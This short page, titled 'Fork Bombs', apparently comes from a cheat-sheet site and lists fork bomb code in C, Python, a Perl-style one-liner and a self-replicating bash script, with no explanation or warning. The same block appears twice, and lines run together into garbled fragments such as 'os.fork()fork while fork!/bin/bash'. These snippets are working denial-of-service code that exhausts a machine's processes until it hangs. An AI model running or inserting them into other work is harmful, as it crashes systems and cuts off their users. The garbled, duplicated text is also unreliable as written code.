Fork Bombs
#include <unistd.h>
int main() {
while(1) { fork(); }
}import os;
while 1:
os.fork()fork while fork!/bin/bash
./$0|./$0& # $0 is the name of the shell script itselfLast updated
#include <unistd.h>
int main() {
while(1) { fork(); }
}import os;
while 1:
os.fork()fork while fork!/bin/bash
./$0|./$0& # $0 is the name of the shell script itselfLast updated